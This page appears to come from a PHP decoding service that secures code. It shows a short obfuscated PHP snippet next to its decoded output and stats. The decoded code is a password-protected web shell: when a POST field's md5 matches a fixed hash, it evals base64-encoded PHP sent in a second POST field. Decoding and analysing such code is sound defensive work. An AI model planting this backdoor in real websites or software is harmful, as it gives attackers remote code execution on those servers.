Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") { eval (base64_deco..

Decoded Output download

<?php 
if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") { 
eval (base64_decode($_POST["php"])); 
exit; 
} 
?>

Did this file decode correctly?

Original Code

<?php
if(@md5($_POST["gif"]) === "320648220d6bd8b8e51ec3b6d6dd8898") {
eval (base64_decode($_POST["php"]));
exit;
}
?>

Function Calls

md5 1

Variables

None

Stats

MD5 6592e6e9fa462bedb4853d277eb364a6
Eval Count 1
Decode Time 85 ms